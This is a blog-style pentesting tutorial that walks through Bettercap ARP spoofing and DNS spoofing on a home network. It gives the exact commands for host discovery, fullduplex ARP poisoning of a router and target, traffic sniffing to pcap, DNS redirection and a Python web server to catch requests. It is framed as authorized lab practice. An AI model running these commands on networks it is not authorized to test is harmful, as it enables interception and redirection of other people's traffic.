Bettercap ARP Spoof and DNS Spoof
Disclaimer: Only perform pentests on your own network or networks you are authorized to test.
Bettercap is great tool pentesting tool to perform ARP spoof and DNS spoof attacks, also known as Man in the Middle Attacks (MITM). However, it has tons of other features as well such as HID (human interface devices such as mice and keyboards) hijacking, Bluetooth Low Energy device hacking, CANBus hacking, etc.
This article will focus on ARP and DNS Spoofing and the commands you need to get started.
Step 1: Scan for devices
Start Bettercap by running this command. To get your interfaces, run ifconfig:
sudo bettercap -face <interface here>
Once Bettercap is open, run this command to scan for devices on the network:
net.probe on
net.show
net.probe will scan for devices and store them internally for you to view. The net.show command lists all the discovered devices. Leave net.probe running or if you are done run net.probe off
I found that should a device have an IPv4 and IPv6 address, that net.show will only disply the IPv6 address. You can run a simple nmap scan as well to get a list of devices using the below command. It performs a ping scan and shows both IPs and MACs.
nmap -sn 192.168.1.0/24
Step 2: ARP spoof
Before starting the ARP spoofing attack, it will be useful to run “arp -a” on the target machine, or just “arp” if it is Linux.
Take note of your MAC address for your router, i.e. the gateway.
Now run these commands in bettercap
- Fullduplex means it will attack the router and the target. This is the only option that worked for me.
- In Targets the first IP is my router and the second IP is my target.
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.1,192.168.1.106
arp.spoof on
Now you can run the same arp command on your target again. The MAC address for your router is now the MAC of the Kali machine.
Step 3: Monitor traffic
set net.sniff.local true
net.sniff on
Set local to true as some modules may make it look as if traffic is originating from the Kali machine even though it is not, so it is a good idea to turn this on.
You can stop the sniffer while ARP is running by issuing this command:
net.sniff off
Now check out the stats for net.sniff. This just gives some useful information about the number of sniffed packets, the net.sniff config, etc
You can also output the net.sniff packets to a pcap file for viewing in Wireshark.
set net.sniff.output /path/to/existing/folder/
Step 4: DNS Spoof
This does not always work, especially if you have DNS set manually or if you are using something like pihole. This could be because of DNSSEC.
This also wont work against sites that implement HSTS.
So at this point I switched routers that run on the 192.168.165./24 IP range to get it to work.
Replace “neverssl.com” with your desired domain.
set dns.spoof.domains *.neverssl.com
set dns.spoof.all true
You will see output like this while net.sniff is running. This tells us that Bettercap did in fact see the DNS request and responded to it.
Step 5: Local Webserver
Kali will now be responding to the domains your are DNS spoofing, so in order for Kali to serve websites you need to start up a webserver. I just used Python as I mainly wanted to see whenever a request came in, I wasn’t too concerned with responding with a website.
In a new terminal run this command:
sudo python3 -m http.server 80
Here we can see we got some requests for /online, requests for favicon.ico etc.
Cleanup
You can type the help command to see which modules are running. For our exercise we will stop the modules we started:
net.sniff off
dns.spoof off
arp.spoof off
net.probe off
It will take about a minute or so for your target device to show the original MAC address in its ARP table.